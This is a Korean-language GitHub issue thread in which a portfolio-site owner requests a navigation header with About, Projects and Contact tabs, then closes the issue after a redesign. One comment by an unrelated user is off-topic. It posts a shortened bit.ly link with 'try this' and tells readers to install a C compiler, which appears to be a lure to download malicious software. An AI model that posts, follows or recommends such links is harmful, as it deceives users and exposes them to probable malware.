### ISSUE TITLE
탭 선택 기능 추가

### ISSUE THREAD

**Issue by GyeongHoKim** [GyeongHoKim/gyeongho.dev#8]
**Is your feature request related to a problem? Please describe.**

아직 포트폴리오로써의 역할을 수행하지 못합니다. 탭 선택 기능을 추가하여 김경호를 소개할 수 있는 여러 페이지를 추가합시다.

**Describe the solution you'd like**

탭 선택을 할 수 있는 Header를 추가합니다. Header에는 다음 페이지를 선택할 수 있는 navigator bar가 포함됩니다.

1. About
2. Projects
  - 디자인 시스템
  - GIS 기반 프로젝트들(게이트, 차량추적)
  - 대시보드(CCTV 클립 다운로드 대시보드)
3. Contact

**Describe alternatives you've considered**

**Additional context**

**Comment by achilles0x** [comment]
try this
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by GyeongHoKim** [comment]
main 페이지 변경으로 인해 구성이 바뀌었습니다.
